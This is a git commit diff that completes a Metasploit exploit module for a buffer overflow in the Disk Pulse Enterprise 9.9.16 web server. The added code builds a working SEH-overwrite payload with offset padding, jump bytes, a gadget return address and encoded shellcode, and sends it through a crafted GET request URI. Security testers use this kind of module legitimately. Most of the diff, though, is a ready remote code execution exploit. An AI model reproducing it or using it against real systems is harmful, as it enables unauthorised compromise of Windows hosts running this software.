Add exploit code

loftwing · loftwing · commit 7db506887bdb · 2017-09-13T10:36:36.000-05:00
diff --git a/modules/exploits/windows/http/disk_pulse_enterprise_get.rb b/modules/exploits/windows/http/disk_pulse_enterprise_get.rb
@@ -9,7 +9,6 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
  
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::Remote::Egghunter
   include Msf::Exploit::Remote::Seh
  
   def initialize(info = {})
@@ -24,7 +23,7 @@ def initialize(info = {})
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'Chance Johnson', # module - hackback.sh - albatross@loftwing.net
+          'Chance Johnson', # msf module - albatross@loftwing.net
           'Nipun Jaswal & Anurag Srivastava' # Original discovery -- www.pyramidcyber.com
         ],
       'References'     =>
@@ -38,19 +37,20 @@ def initialize(info = {})
       'Platform'       => 'win',
       'Payload'        =>
         {
+          'EncoderType' => "alpha_mixed",
           'BadChars' => "\x00\x0a\x0d\x26"
         },
       'Targets'        =>
         [
           [ 'Disk Pulse Enterprise 9.9.16',
             {
-              'Ret' => 0x10013AAA, # pop ebp # pop ebx # ret 0x04 - libspp.dll
-              'Offset' => 12600
+              'Ret' => 0x1013ADDD, # POP EDI POP ESI RET 04 -- libpal.dll
+              'Offset' => 2492
             }
           ],
         ],
       'Privileged'     => true,
-      'DisclosureDate' => 'Oct 03 2016',
+      'DisclosureDate' => 'Aug 25 2017',
       'DefaultTarget'  => 0))
  
     register_options([Opt::RPORT(80)], self.class)
@@ -71,7 +71,28 @@ def check
   end
  
   def exploit
-    
- 
+    connect
+
+    print_status("Generating exploit...")
+    exp = payload.encoded
+    exp << 'A' * (target['Offset'] - payload.encoded.length) # buffer of trash until we get to offset
+    exp << "\xEB\x10\x90\x90" # nSEH - jmp short 0x12 down to next record
+    exp << "\xDD\xAD\x13\x10" # SEH  - pop ebx, pop ecx, retn - libspp.dll
+    exp << "\x90" * 10
+    exp << "\xE9\x25\xBF\xFF\xFF" # jmp 0xffffbf2a - jmp back to shellcode start
+    exp << 'B' * (5000 - exp.length)
+
+    print_status("Sending exploit.")
+
+    res = send_request_cgi({
+      'uri' => '/../' + exp,
+      'method' => 'GET',
+      'host' => '4.2.2.2',
+      'connection' => 'keep-alive'
+    })
+
+  handler
+  disconnect
+
   end
 end
